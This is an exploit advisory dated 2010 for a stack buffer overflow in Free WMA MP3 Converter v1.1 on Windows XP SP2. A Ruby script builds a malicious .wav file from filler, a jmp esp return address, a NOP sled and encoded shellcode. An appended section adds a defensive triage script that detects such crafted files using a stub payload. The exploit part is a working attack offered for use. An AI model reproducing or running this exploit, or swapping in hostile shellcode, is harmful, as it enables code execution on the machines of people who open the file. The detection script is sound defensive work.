Free WMA MP3 Converter v1.1 0day
Posted on 02 April 2010
================================ Free WMA MP3 Converter v1.1 0day ================================

# Date: 02/04/2010
# Author: Richard leahy
# Software Link: http://www.freewarefiles.com/downloads_counter.php?programid=44210
# Version: 1.1
# Tested on: Windows XP SP2
# Category: local exploit

To trigger the vulnerability: open the application, choose "wav to mp3", load the specially crafted .wav file and click Convert. It probably works for all the other options too, e.g. mp3 to wav.

Run the code below and pipe its output into a .wav file.

#code
#!/usr/bin/env ruby
nop = "\x90"

# return address: a jmp esp instruction inside imagehlp (XP SP2 address)
jmp_esp = [0x76cafa32].pack('V')

# shellcode opens notepad
shellcode = "\xd9\xc7\xd9\x74\x24\xf4\xba\xcc\x7a\xcb\xf7\x33\xc9\xb1" +
"\x33\x5e\x83\xee\xfc\x31\x56\x13\x03\x9a\x69\x29\x02\xde" +
"\x66\x24\xed\x1e\x77\x57\x67\xfb\x46\x45\x13\x88\xfb\x59" +
"\x57\xdc\xf7\x12\x35\xf4\x8c\x57\x92\xfb\x25\xdd\xc4\x32" +
"\xb5\xd3\xc8\x98\x75\x75\xb5\xe2\xa9\x55\x84\x2d\xbc\x94" +
"\xc1\x53\x4f\xc4\x9a\x18\xe2\xf9\xaf\x5c\x3f\xfb\x7f\xeb" +
"\x7f\x83\xfa\x2b\x0b\x39\x04\x7b\xa4\x36\x4e\x63\xce\x11" +
"\x6f\x92\x03\x42\x53\xdd\x28\xb1\x27\xdc\xf8\x8b\xc8\xef" +
"\xc4\x40\xf7\xc0\xc8\x99\x3f\xe6\x32\xec\x4b\x15\xce\xf7" +
"\x8f\x64\x14\x7d\x12\xce\xdf\x25\xf6\xef\x0c\xb3\x7d\xe3" +
"\xf9\xb7\xda\xe7\xfc\x14\x51\x13\x74\x9b\xb6\x92\xce\xb8" +
"\x12\xff\x95\xa1\x03\xa5\x78\xdd\x54\x01\x24\x7b\x1e\xa3" +
"\x31\xfd\x7d\xa9\xc4\x8f\xfb\x94\xc7\x8f\x03\xb6\xaf\xbe" +
"\x88\x59\xb7\x3e\x5b\x1e\x47\x75\xc6\x36\xc0\xd0\x92\x0b" +
"\x8d\xe2\x48\x4f\xa8\x60\x79\x2f\x4f\x78\x08\x2a\x0b\x3e" +
"\xe0\x46\x04\xab\x06\xf5\x25\xfe\x69\x96\xad\x64\x06\x09" +
"\x2a\x67\xec"

# 4112 bytes of filler, then the overwritten return address, a short NOP sled
# and the shellcode
boom = "\x41" * 4112 + jmp_esp + nop * 10 + shellcode
puts boom

# Inj3ct0r.com [2010-04-02]
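As an added defender-side example (not part of the original advisory), a Ruby triage script that checks whether a suspect .wav carries a real RIFF/WAVE header and looks for the layout the advisory's buffer uses: a long run of one filler byte followed by a 4-byte little-endian pointer. The sample inputs are constructed here, with the string `STUB` standing in for any shellcode, and the 1024-byte run threshold is an assumed heuristic.

```ruby
#!/usr/bin/env ruby
# Added triage helper, not part of the original advisory. It checks a
# suspect .wav for a real RIFF/WAVE header and for the layout the exploit
# uses: a long filler run followed by a 4-byte little-endian pointer.

# True when the data starts with a well-formed RIFF/WAVE header.
def riff_wave?(data)
  data.bytesize >= 12 && data[0, 4] == "RIFF" && data[8, 4] == "WAVE"
end

# Longest run of one repeated byte, as [start_offset, length, byte_value].
def longest_run(data)
  best = [0, 0, nil]
  i = 0
  while i < data.bytesize
    j = i
    j += 1 while j < data.bytesize && data.getbyte(j) == data.getbyte(i)
    best = [i, j - i, data.getbyte(i)] if j - i > best[1]
    i = j
  end
  best
end

# Verdict hash: a file with no WAVE header and a filler run of at least
# min_run bytes (assumed threshold) is flagged; the 4 bytes after the run
# are decoded with unpack1("V"), the inverse of the advisory's pack('V').
def triage(data, min_run: 1024)
  start, len, byte = longest_run(data)
  after = start + len
  ptr = data.bytesize >= after + 4 ? data[after, 4].unpack1("V") : nil
  { suspicious: !riff_wave?(data) && len >= min_run,
    run_len: len, run_byte: byte, pointer_after_run: ptr }
end

# Constructed samples (binary strings): a minimal WAV header, and a file
# laid out like the advisory's buffer with "STUB" standing in for shellcode.
SAMPLE_WAV = "RIFF".b + [36].pack("V") + "WAVEfmt ".b + "\x00".b * 24
SAMPLE_CRAFTED = "A".b * 4112 + [0x76cafa32].pack("V") + "\x90".b * 10 + "STUB".b

if __FILE__ == $0
  data = ARGV[0] ? File.binread(ARGV[0]) : SAMPLE_CRAFTED
  p triage(data)
end
```

Pass a file path as the first argument to triage a real file; with no argument it runs over the constructed crafted sample.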